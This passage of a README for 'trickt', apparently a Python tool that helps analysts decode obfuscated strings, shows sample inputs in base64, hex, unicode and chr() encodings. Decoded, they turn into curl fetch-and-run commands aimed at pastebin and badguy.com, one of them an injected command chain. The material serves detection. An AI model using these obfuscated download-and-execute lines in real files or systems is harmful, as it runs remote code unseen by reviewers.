b'XHg2M1x4NzVceDcyXHg2Q1x4MjBceDY4XHg3OFx4NzhceDcwXHg3M1x4M0FceDJGXHgyRlx4NzBceDYxXHg3M1x4NzRceDY1XHg2Mlx4NjlceDZFXHgyRVx4NjNceDZGXHg2RFx4MkZceDcyXHg2MVx4NzdceDJGXHg2NVx4NzNceDYzXHg2MVx4NzBceDY1XHg2NFx4NUZceDY4XHg2NVx4NzhceDVGXHg2RVx4NjVceDczXHg3NFx4NjVceDY0XHgyMFx4M0VceDIwXHg2Mlx4NjFceDY0XHg1Rlx4NjZceDY5XHg2Q1x4NjVceDJFXHg3M1x4NjhceDIwXHgyNlx4MjZceDIwXHgyRVx4MkZceDYyXHg2MVx4NjRceDVGXHg2Nlx4NjlceDZDXHg2NVx4MkVceDczXHg2OAo=\\n'\n    |\n    |--decoded_base64\u003e  b'\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x5F\\\\x6E\\\\x65\\\\x73\\\\x74\\\\x65\\\\x64\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68'\n        |\n        |--decoded_escaped_characters\u003e  b'curl hxxps://pastebin.com/raw/escaped_hex_nested \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n\nline 5::original:\u003e  b'\u003celement\u003e\u003celement2\u003e\\\\u0063\\\\u0075\\\\u0072\\\\u006c\\\\u0020\\\\u0068\\\\u0078\\\\u0078\\\\u0070\\\\u0073\\\\u003a\\\\u002f\\\\u002f\\\\u0070\\\\u0061\\\\u0073\\\\u0074\\\\u0065\\\\u0062\\\\u0069\\\\u006e\\\\u002e\\\\u0063\\\\u006f\\\\u006d\\\\u002f\\\\u0072\\\\u0061\\\\u0077\\\\u002f\\\\u0065\\\\u0073\\\\u0063\\\\u0061\\\\u0070\\\\u0065\\\\u0064\\\\u005f\\\\u0075\\\\u006e\\\\u0069\\\\u0063\\\\u006f\\\\u0064\\\\u0065\\\\u0020\\\\u003e\\\\u0020\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068\\\\u0020\\\\u0026\\\\u0026\\\\u0020\\\\u002e\\\\u002f\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068\u003c/element2\u003e\u003c/element\u003e\\n'\n    |\n    |--decoded_escaped_characters\u003e  b'curl hxxps://pastebin.com/raw/escaped_unicode \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n\nline 5::original:\u003e  b'\u003celement\u003e\u003celement2\u003e\\\\u0063\\\\u0075\\\\u0072\\\\u006c\\\\u0020\\\\u0068\\\\u0078\\\\u0078\\\\u0070\\\\u0073\\\\u003a\\\\u002f\\\\u002f\\\\u0070\\\\u0061\\\\u0073\\\\u0074\\\\u0065\\\\u0062\\\\u0069\\\\u006e\\\\u002e\\\\u0063\\\\u006f\\\\u006d\\\\u002f\\\\u0072\\\\u0061\\\\u0077\\\\u002f\\\\u0065\\\\u0073\\\\u0063\\\\u0061\\\\u0070\\\\u0065\\\\u0064\\\\u005f\\\\u0075\\\\u006e\\\\u0069\\\\u0063\\\\u006f\\\\u0064\\\\u0065\\\\u0020\\\\u003e\\\\u0020\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068\\\\u0020\\\\u0026\\\\u0026\\\\u0020\\\\u002e\\\\u002f\\\\u0062\\\\u0061\\\\u0064\\\\u005f\\\\u0066\\\\u0069\\\\u006c\\\\u0065\\\\u002e\\\\u0073\\\\u0068\u003c/element2\u003e\u003c/element\u003e\\n'\n    |\n    |--decoded_base64\u003e  b'\\xbbM:\\xde\\xed4\\xef\\x9b\\xb4\\xd3\\xbd\\xae\\xd3N\\x9c\\xbbM6\\xd2\\xed4\\xeb\\xcb\\xb4\\xd3\\xbf.\\xd3N\\xfc\\xbbM;\\xd2\\xed4\\xef{\\xb4\\xd3v\\xae\\xd3M\\x9f\\xbbM6~\\xed4\\xefK\\xb4\\xd3\\xadn\\xd3N\\xf7\\xbbM;\\xe2\\xed4\\xeb\\x9b\\xb4\\xd3\\xad\\xae\\xd3N\\xbd\\xbbM:z\\xed4\\xd9\\xeb\\xb4\\xd3\\xad\\xee\\xd3N\\x9f\\xbbM:v\\xed4\\xd9\\xfb\\xb4\\xd3\\xbd\\xae\\xd3N\\xb5\\xbbM;\\xee\\xed4\\xd9\\xfb\\xb4\\xd3\\xaen\\xd3N\\xf7\\xbbM:\\xde\\xed4\\xeb[\\xb4\\xd3\\xbd.\\xd3N\\xb9\\xbbM:\\xe2\\xed4\\xe5\\xfb\\xb4\\xd3\\xben\\xd3N\\x9e\\xbbM:\\xf6\\xed4\\xeb{\\xb4\\xd3\\xa7\\xee\\xd3N\\xb8\\xbbM:\\xe6\\xed4\\xdbK\\xb4\\xd3w\\xae\\xd3M\\xb4\\xbbM:\\xda\\xed4\\xeb[\\xb4\\xd3\\xae.\\xd3N_\\xbbM:\\xea\\xed4\\xeb\\xdb\\xb4\\xd3\\xa7.\\xd3N\\xb9\\xbbM6z\\xed4\\xef{\\xb4\\xd3\\xaf.\\xd3M\\xb4\\xbbM6\\xea\\xed4\\xdb\\xab\\xb4\\xd3m.\\xd3M\\x9e\\xbbM6~\\xed4\\xebk\\xb4\\xd3\\xadn\\xd3N\\xb8\\xbbM9~\\xed4\\xeb\\xab\\xb4\\xd3\\xafn\\xd3N\\x9c\\xbbM:\\xe6\\xed4\\xd9\\xeb\\xb4\\xd3\\xbd\\xee\\xd3N\\xbc'\n\nline 7::original:\u003e  b\"my_hex = '\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F' + '\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F' + '\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65' + '\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69' + '\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68'\\n\"\n    |\n    |--decoded_escaped_characters\u003e  b'curl hxxps://pastebin.com/raw/escaped_hex \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n\nline 9::original:\u003e  b\"oops, forgot my script here:  readpipe(chr(99) . chr(117) . chr(114) . chr(108) . chr(32) . chr(104) . chr(120) . chr(120) . chr(112) . chr(115) . chr(58) . chr(47) . chr(47) . chr(112) . chr(97) . chr(115) . chr(116) . chr(101) . chr(98) . chr(105) . chr(110) . chr(46) . chr(99) . chr(111) . chr(109) . chr(47) . chr(114) . chr(97) . chr(119) . chr(47) . chr(99) . chr(111) . chr(100) . chr(101) . chr(95) . chr(112) . chr(111) . chr(105) . chr(110) . chr(116) . chr(115) . chr(32) . chr(62) . chr(32) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104) . chr(32) . chr(38) . chr(38) . chr(32) . chr(46) . chr(47) . chr(98) . chr(97) . chr(100) . chr(95) . chr(102) . chr(105) . chr(108) . chr(101) . chr(46) . chr(115) . chr(104)) which I hope you don't catch\\n\"\n    |\n    |--decoded_code_point\u003e  b'curl hxxps://pastebin.com/raw/code_points \u003e bad_file.sh \u0026\u0026 ./bad_file.sh'\n```\n\n### Pretty print\n\nIf you don't like looking at escaped new-line and tab characters, you can pretty print with the `-p` or `--pretty` switches.\n\nWithout `--pretty`:\n```bash\n$ trickt 'WwoJewoJCSJrZXkiOiAidmFsdWUgd2l0aCBubyB0cmlja2luZXNzIiwKCQkibmFpdmUtY29tbWFuZHMiOiBbCgkJCSJPeUJqZFhKc0lHaDRlSEJiT2wwdkwySmhaR2QxZVM1amIyMHZiV0ZzZWlBK0lISjFibTFsTG5Ob0lDWW1JR05vYlc5a0lDdDRJSEoxYm0xbExuTm9JQ1ltSUM0dmNuVnViV1V1YzJnN0NnPT0iLAoJCQkibHMgLWFsaCIKCQldLAoJCSJkdXJhdGlvbiI6IDM2MDAsCgkJImRpY3QiOiB7CgkJCSJpbm5lci1rZXkiOiAiaW5uZXItdmFsdWUiCgkJfQoJfQpdCg=='\n\nSearching string for trickiness...\n\nline 1::original:\u003e  b'WwoJewoJCSJrZXkiOiAidmFsdWUgd2l0aCBubyB0cmlja2luZXNzIiwKCQkibmFpdmUtY29tbWFuZHMiOiBbCgkJCSJPeUJqZFhKc0lHaDRlSEJiT2wwdkwySmhaR2QxZVM1amIyMHZiV0ZzZWlBK0lISjFibTFsTG5Ob0lDWW1JR05vYlc5a0lDdDRJSEoxYm0xbExuTm9JQ1ltSUM0dmNuVnViV1V1YzJnN0NnPT0iLAoJCQkibHMgLWFsaCIKCQldLAoJCSJkdXJhdGlvbiI6IDM2MDAsCgkJImRpY3QiOiB7CgkJCSJpbm5lci1rZXkiOiAiaW5uZXItdmFsdWUiCgkJfQoJfQpdCg=='\n    |\n    |--decoded_base64\u003e  b'[\\n\\t{\\n\\t\\t\"key\": \"value with no trickiness\",\\n\\t\\t\"naive-commands\": [\\n\\t\\t\\t\"OyBjdXJsIGh4eHBbOl0vL2JhZGd1eS5jb20vbWFseiA+IHJ1bm1lLnNoICYmIGNobW9kICt4IHJ1bm1lLnNoICYmIC4vcnVubWUuc2g7Cg==\",\\n\\t\\t\\t\"ls -alh\"\\n\\t\\t],\\n\\t\\t\"duration\": 3600,\\n\\t\\t\"dict\": {\\n\\t\\t\\t\"inner-key\": \"inner-value\"\\n\\t\\t}\\n\\t}\\n]'\n        |\n        |--decoded_base64\u003e  b'; curl hxxp[:]//badguy.com/malz \u003e runme.sh \u0026\u0026 chmod +x runme.sh \u0026\u0026 ./runme.sh;'\n```\n\nWith `--pretty`:\n```bash\n$ trickt --pretty 'WwoJewoJCSJrZXkiOiAidmFsdWUgd2l0aCBubyB0cmlja2luZXNzIiwKCQkibmFpdmUtY29tbWFuZHMiOiBbCgkJCSJPeUJqZFhKc0lHaDRlSEJiT2wwdkwySmhaR2QxZVM1amIyMHZiV0ZzZWlBK0lISjFibTFsTG5Ob0lDWW1JR05vYlc5a0lDdDRJSEoxYm0xbExuTm9JQ1ltSUM0dmNuVnViV1V1YzJnN0NnPT0iLAoJCQkibHMgLWFsaCIKCQldLAoJCSJkdXJhdGlvbiI6IDM2MDAsCgkJImRpY3QiOiB7CgkJCSJpbm5lci1rZXkiOiAiaW5uZXItdmFsdWUiCgkJfQoJfQpdCg=='\n\nSearching string for trickiness...\n\nline 1::original:\u003e  WwoJewoJCSJrZXkiOiAidmFsdWUgd2l0aCBubyB0cmlja2luZXNzIiwKCQkibmFpdmUtY29tbWFuZHMiOiBbCgkJCSJPeUJqZFhKc0lHaDRlSEJiT2wwdkwySmhaR2QxZVM1amIyMHZiV0ZzZWlBK0lISjFibTFsTG5Ob0lDWW1JR05vYlc5a0lDdDRJSEoxYm0xbExuTm9JQ1ltSUM0dmNuVnViV1V1YzJnN0NnPT0iLAoJCQkibHMgLWFsaCIKCQldLAoJCSJkdXJhdGlvbiI6IDM2MDAsCgkJImRpY3QiOiB7CgkJCSJpbm5lci1rZXkiOiAiaW5uZXItdmFsdWUiCgkJfQoJfQpdCg==\n    |\n    |--decoded_base64\u003e  [\n        {\n                \"key\": \"value with no trickiness\",\n                \"naive-commands\": [\n                        \"OyBjdXJsIGh4eHBbOl0vL2JhZGd1eS5jb20vbWFseiA+IHJ1bm1lLnNoICYmIGNobW9kICt4IHJ1bm1lLnNoICYmIC4vcnVubWUuc2g7Cg==\",\n                        \"ls -alh\"\n                ],\n                \"duration\": 3600,\n                \"dict\": {\n                        \"inner-key\": \"inner-value\"\n                }\n        }\n]\n        |\n        |--decoded_base64\u003e  ; curl hxxp[:]//badguy.com/malz \u003e runme.sh \u0026\u0026 chmod +x runme.sh \u0026\u0026 ./runme.sh;\n```\n\nIf you find that `trickt` errors out when running with the `--pretty` switch, then you can try changing the\nencoding type with the `-e` or `--encoding` switch. The default is `utf-8`. The byte string is decoded with the\nvalue from this switch before being printed to the screen.\n\n### Expectations when using `trickt`\n\nTrickt is not mean to be exhaustive in its capabilities. It is meant to give analysts a quick look at a file or string\nto identify common obfuscation or trickiness. For example, here are the regular expressions used to identify strings\nwhich `trickt` should analyze further for trickiness:\n\n```python\nREGEX_CHR_STRING = br\"(chr\\(.+chr\\([0-9]+\\))\"  # Pulls out all chr() strings within a single line.\nREGEX_ESCAPED_CHARACTERS_STRING = br\"(\\\\[xu].+\\\\[xu][0-9a-fA-F]+)\"\n_REGEX_B64_STRING = br\"([0-9a-zA-Z\\+\\\\]{32,}[=]{0,2})\"\nREGEX_URL_ENCODED = br\"^.*%[0-9a-fA-F]{2}.*$\"\n```\nAs you can see... not exhaustive nor much finesse.\n\n## Use the API\n\nYou can use the individual functions by importing `trickt`.\n- Note that by using the individual deobfuscation function, you will NOT get the\nrecursive functionality with the current version.\n- If you want the full recursive capability, use `trackt.all()` instead (see below)\n\n```python\n\u003e\u003e\u003e import trickt\n\u003e\u003e\u003e\n\u003e\u003e\u003e s = br'XHg2M1x4NzVceDcyXHg2Q1x4MjBceDY4XHg3OFx4NzhceDcwXHg3M1x4M0FceDJGXHgyRlx4NzBceDYxXHg3M1x4NzRceDY1XHg2Mlx4NjlceDZFXHgyRVx4NjNceDZGXHg2RFx4MkZceDcyXHg2MVx4NzdceDJGXHg2NVx4NzNceDYzXHg2MVx4NzBceDY1XHg2NFx4NUZceDY4XHg2NVx4NzhceDVGXHg2RVx4NjVceDczXHg3NFx4NjVceDY0XHgyMFx4M0VceDIwXHg2Mlx4NjFceDY0XHg1Rlx4NjZceDY5XHg2Q1x4NjVceDJFXHg3M1x4NjhceDIwXHgyNlx4MjZceDIwXHgyRVx4MkZceDYyXHg2MVx4NjRceDVGXHg2Nlx4NjlceDZDXHg2NVx4MkVceDczXHg2OAo='\n\u003e\u003e\u003e\n\u003e\u003e\u003e result = trickt.base64_decode(s)\n\u003e\u003e\u003e \n\u003e\u003e\u003e print(result)\n[b'\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x5F\\\\x6E\\\\x65\\\\x73\\\\x74\\\\x65\\\\x64\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68']\n\u003e\u003e\u003e\n\u003e\u003e\u003e result2 = trickt.escaped_characters(result[0])\n\u003e\u003e\u003e\n\u003e\u003e\u003eprint(result2)\n[b'curl hxxps://pastebin.com/raw/escaped_hex_nested \u003e bad_file.sh \u0026\u0026 ./bad_file.sh']\n```\n\nUse `trickt.all()` to return a dictionary of all results `trickt` found to be interesting on a single string. This\nincludes recursive/child results.\n\n```python\n\u003e\u003e import json\n\u003e\u003e\n\u003e\u003e import trickt\n\u003e\u003e\n\u003e\u003e s = br'XHg2M1x4NzVceDcyXHg2Q1x4MjBceDY4XHg3OFx4NzhceDcwXHg3M1x4M0FceDJGXHgyRlx4NzBceDYxXHg3M1x4NzRceDY1XHg2Mlx4NjlceDZFXHgyRVx4NjNceDZGXHg2RFx4MkZceDcyXHg2MVx4NzdceDJGXHg2NVx4NzNceDYzXHg2MVx4NzBceDY1XHg2NFx4NUZceDY4XHg2NVx4NzhceDVGXHg2RVx4NjVceDczXHg3NFx4NjVceDY0XHgyMFx4M0VceDIwXHg2Mlx4NjFceDY0XHg1Rlx4NjZceDY5XHg2Q1x4NjVceDJFXHg3M1x4NjhceDIwXHgyNlx4MjZceDIwXHgyRVx4MkZceDYyXHg2MVx4NjRceDVGXHg2Nlx4NjlceDZDXHg2NVx4MkVceDczXHg2OAo='\n\u003e\u003e\n\u003e\u003e result = trickt.all(s)\n\u003e\u003e\n\u003e\u003e print(result)\n{'url_encoded': [], 'code_point': [], 'escaped_characters': [], 'base64': [{'value': b'\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x5F\\\\x6E\\\\x65\\\\x73\\\\x74\\\\x65\\\\x64\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68', 'depth': 0, 'child': {'url_encoded': [], 'code_point': [], 'escaped_characters': [{'value': b'curl hxxps://pastebin.com/raw/escaped_hex_nested \u003e bad_file.sh \u0026\u0026 ./bad_file.sh', 'depth': 1, 'child': {'url_encoded': [], 'code_point': [], 'escaped_characters': [], 'base64': []}}], 'base64': []}}]}\n\u003e\u003e\u003e\n\u003e\u003e\u003e # Or, if we want to pretty it up\n... \n\u003e\u003e\u003e def pretty(my_dict):\n...     for key, value in my_dict.items():\n...         if isinstance(value, dict):\n...             my_dict[key] = pretty(value)\n...         if isinstance(value, list):\n...             my_dict[key] = [pretty(item) for item in value]\n...         if isinstance(value, bytes):\n...             my_dict[key] = value.decode('utf-8')\n...         continue\n...     return my_dict\n\u003e\u003e\u003e\n\u003e\u003e\u003e print(json.dumps(pretty(result), indent=2))\n{\n  \"url_encoded\": [],\n  \"code_point\": [],\n  \"escaped_characters\": [],\n  \"base64\": [\n    {\n      \"value\": \"\\\\x63\\\\x75\\\\x72\\\\x6C\\\\x20\\\\x68\\\\x78\\\\x78\\\\x70\\\\x73\\\\x3A\\\\x2F\\\\x2F\\\\x70\\\\x61\\\\x73\\\\x74\\\\x65\\\\x62\\\\x69\\\\x6E\\\\x2E\\\\x63\\\\x6F\\\\x6D\\\\x2F\\\\x72\\\\x61\\\\x77\\\\x2F\\\\x65\\\\x73\\\\x63\\\\x61\\\\x70\\\\x65\\\\x64\\\\x5F\\\\x68\\\\x65\\\\x78\\\\x5F\\\\x6E\\\\x65\\\\x73\\\\x74\\\\x65\\\\x64\\\\x20\\\\x3E\\\\x20\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\\\\x20\\\\x26\\\\x26\\\\x20\\\\x2E\\\\x2F\\\\x62\\\\x61\\\\x64\\\\x5F\\\\x66\\\\x69\\\\x6C\\\\x65\\\\x2E\\\\x73\\\\x68\",\n      \"depth\": 0,\n      \"child\": {\n        \"url_encoded\": [],\n        \"code_point\": [],\n        \"escaped_characters\": [\n          {\n            \"value\": \"curl hxxps://pastebin.com/raw/escaped_hex_nested \u003e bad_file.sh \u0026\u0026 ./bad_file.sh\",\n            \"depth\": 1,\n            \"child\": {\n              \"url_encoded\": [],\n              \"code_point\": [],\n              \"escaped_characters\": [],\n              \"base64\": []\n            }\n          }\n        ],\n        \"base64\": []\n      }\n    }\n  ]\n}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrayzpipes%2Ftrickt","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkrayzpipes%2Ftrickt","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrayzpipes%2Ftrickt/lists"}